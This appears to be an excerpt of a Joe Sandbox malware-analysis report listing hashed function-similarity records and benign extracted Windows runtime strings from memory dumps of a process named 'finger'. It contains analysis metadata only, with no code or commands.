                                                              • API String ID: 0-484625025
                                                              • Opcode ID: cbaba81578802e6eaf8bd5dd683b8bccf454799406d93f30956e554f0bf949ef
                                                              • Instruction ID: be2d407606837f1269d94fc6da4c07cde34421379d64f8d72250ceaf9151c395
                                                              • Opcode Fuzzy Hash: cbaba81578802e6eaf8bd5dd683b8bccf454799406d93f30956e554f0bf949ef
                                                              • Instruction Fuzzy Hash: 0E510835A203196FDF24EAA9DC95FEEB3BCAF44344F0401A9D505AB191D7B0AAC58F50
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                              • Instruction ID: 36eace334b1bc1aa5735fa59ee5d77ecb5312e14b78869fd8b294694ef89dc29
                                                              • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                              • Instruction Fuzzy Hash: 000224B5508341AFC304CF28C990E6FBBE5EFC8700F449A2DB9898B264DB71E945CB42
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction ID: 567e1f4c075c75283a4ad1cfa9192390a832ee389863b7b6fb41c29169243ddb
                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction Fuzzy Hash: 4A81BC35E752CA9ADF24CE68C8927AEBBA5AF45310F2C435DD861A73D0C77488C0CB50
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$[$]:%u
                                                              • API String ID: 48624451-2819853543
                                                              • Opcode ID: 67335eb2ce4a03032889623fedaae0da8eaf0dc491996e07a3810698d58eddb2
                                                              • Instruction ID: cbba936237037a00da38da365b49f7d9355fb67d361b96b76e60334e34b5ef67
                                                              • Opcode Fuzzy Hash: 67335eb2ce4a03032889623fedaae0da8eaf0dc491996e07a3810698d58eddb2
                                                              • Instruction Fuzzy Hash: D0215376E10219ABDB10DE69DD84AEFB7F8AF45644F08451AE905E7200E770D9418BE1
                                                              Strings
                                                              • RTL: Re-Waiting, xrefs: 032F031E
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 032F02E7
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 032F02BD
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                              • API String ID: 0-2474120054
                                                              • Opcode ID: e87de6b73ea166b02166f4920dc1b09723bc7b4f2068269bf66b320efda3438a
                                                              • Instruction ID: 58efd630fb05af1bcc32f007bc3083ea86c563cf8b67fb8e5904b8840e58c522
                                                              • Opcode Fuzzy Hash: e87de6b73ea166b02166f4920dc1b09723bc7b4f2068269bf66b320efda3438a
                                                              • Instruction Fuzzy Hash: 73E1C030624B42AFD725CF28CD84B2AF7E4BB44714F184A6DF5A58B2D1D778D884CB52
                                                              Strings
                                                              • RTL: Resource at %p, xrefs: 032F7B8E
                                                              • RTL: Re-Waiting, xrefs: 032F7BAC
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 032F7B7F
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 0-871070163
                                                              • Opcode ID: e34f0187caa2aee5f5d1d48eefa5a90ab332c38c52bafe65bd98494eb1d5a801
                                                              • Instruction ID: e4d12beaf6702569a057715d086c66316c60b022cf465df8a7f599d841dceebb
                                                              • Opcode Fuzzy Hash: e34f0187caa2aee5f5d1d48eefa5a90ab332c38c52bafe65bd98494eb1d5a801
                                                              • Instruction Fuzzy Hash: 3A4102357247039FD724CE29C840BAAB7E5EF89750F040A2DF95ADB680DB71E485CB91
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 032F728C
                                                              Strings
                                                              • RTL: Resource at %p, xrefs: 032F72A3
                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 032F7294
                                                              • RTL: Re-Waiting, xrefs: 032F72C1
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-605551621
                                                              • Opcode ID: 3a571170e8b36855ca0a7ad94501eeb0b652649bb0c284d9e72d8d6ee9764457
                                                              • Instruction ID: 7226b7e9b6c73ea47a823989dd11242f212c42bb4f3433d4ecceb7bf7599888e
                                                              • Opcode Fuzzy Hash: 3a571170e8b36855ca0a7ad94501eeb0b652649bb0c284d9e72d8d6ee9764457
                                                              • Instruction Fuzzy Hash: 5041D035620306AFD720DE29CC91FAAF7B5FF44750F140629F955AB280DB71E89287D1
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: 6e119f02b3b8316c579bb91619577184636755d1e15f1d3e8b465b06eec892a3
                                                              • Instruction ID: de312e328103f5f9407b818afe46f050b1b5981d38960080096c839f416070b4
                                                              • Opcode Fuzzy Hash: 6e119f02b3b8316c579bb91619577184636755d1e15f1d3e8b465b06eec892a3
                                                              • Instruction Fuzzy Hash: 29317876A102199FCB20DF29DC80BEFB7F8FF45610F444559E849E7240EB30AA448FA1
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-
                                                              • API String ID: 1302938615-2137968064
                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction ID: e433928fb85c575db7e46b6696d397f4e021218ed7b05b832585b09b1fae339b
                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction Fuzzy Hash: 5F91A071E3029A9EDB24DE6DC8906BEB7A5BF44320F18875EE865A72C0D77089C18F50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $$@
                                                              • API String ID: 0-1194432280
                                                              • Opcode ID: eb4e7de90207b2a2ded5fb3b2f0221026bf530ae155b410f37b8dc976d0e8b92
                                                              • Instruction ID: e92c06eeea0575e571cff4ecb5fedd3fe6d3ee8e4ee0d54ef06be1877df612c0
                                                              • Opcode Fuzzy Hash: eb4e7de90207b2a2ded5fb3b2f0221026bf530ae155b410f37b8dc976d0e8b92
                                                              • Instruction Fuzzy Hash: 07814875D10269DBDB31DB54CC45BEEB7B8AB08710F0445EAA91AB7280E7709EC0CFA0
                                                              APIs
                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 0330CFBD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, Offset: 03250000, based on PE: true
                                                              • Associated: 0000000B.00000002.3140702955.0000000003379000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.000000000337D000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_3250000_finger.jbxd
                                                              Similarity
                                                              • API ID: CallFilterFunc@8
                                                              • String ID: @$@4rw@4rw
                                                              • API String ID: 4062629308-2979693914
                                                              • Opcode ID: c2d3c5d0c1f30a09353a0ddf90f3617fafd1b858dbb182a6e5b6fcee9846e3d2
                                                              • Instruction ID: f778774306bad9aa33554bb522b4ff904cb842ee54ab350394e5eff7fcfb83ad
                                                              • Opcode Fuzzy Hash: c2d3c5d0c1f30a09353a0ddf90f3617fafd1b858dbb182a6e5b6fcee9846e3d2
                                                              • Instruction Fuzzy Hash: C141B1B5910318DFDB21DF95C990AAEBBF8EF44710F04412AE914DF294D778C881CB91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000B.00000002.3141304255.00000000035A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_11_2_35a0000_finger.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $$0$@$@
                                                              • API String ID: 0-1132210376
                                                              • Opcode ID: 4fe272b2b72627303fa43c44375c99b71c90e76ecacbfcf8f168d034213176c6
                                                              • Instruction ID: 5c999a283d54bd1f1759cc315168fbbd56b7f78486b1ca0eb62f54454ca48b95
                                                              • Opcode Fuzzy Hash: 4fe272b2b72627303fa43c44375c99b71c90e76ecacbfcf8f168d034213176c6
                                                              • Instruction Fuzzy Hash: C751B170628B488FCB18CF68D8856DEBBF4FB89714F10055EE88A93251C734E645CB86